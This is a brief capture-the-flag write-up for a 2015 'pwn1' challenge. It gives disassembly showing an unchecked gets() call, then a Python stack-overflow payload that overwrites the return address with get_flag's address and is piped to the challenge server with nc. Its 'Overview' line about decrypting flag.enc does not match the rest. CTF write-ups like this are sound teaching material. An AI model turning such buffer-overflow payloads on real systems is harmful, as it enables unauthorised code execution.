pwn1 - 40 (Pwning)
Writeup by r3ndom_
Created: 2015-12-8
Problem
First pwnable, this should be nice and easy.
nc pwn.problem.sctf.io 1337.
Hint
Read up on Buffer Overflows.
Answer
Overview
Reverse the encryption on the flag.enc
Details
public get_flag
get_flag proc near
push ebp
mov ebp, esp
sub esp, 18h
mov dword ptr [esp], offset command ; "cat flag.txt"
loc_80484BA: ; DATA XREF: BFFFF6F9r
call _system
leave
retn
get_flag endp
public bo
bo proc near ; CODE XREF: main+15p
s = byte ptr -28h
push ebp
loc_80484C2:
mov ebp, esp
sub esp, 38h
lea eax, [ebp+s]
mov [esp], eax ; s
call _gets
lea eax, [ebp-28h]
mov [esp+4], eax
mov dword ptr [esp], offset format ; "You said: %s\n"
call _printf
leave
retn
bo endp
Super simple stack overflow. The stack will return at an address at ebp + 0x2c so you just overflow that much.
Then you give it the address of the get_flag func.
rop = 'A'*0x2c
rop += '\xad\x84\x04\x08'
print rop
After that just pipe it into the process and bam.
python rop.py | nc pwn.problem.sctf.io 1337
Flag
flag{that_was_so_easy_i_wont_leetify_this_flag}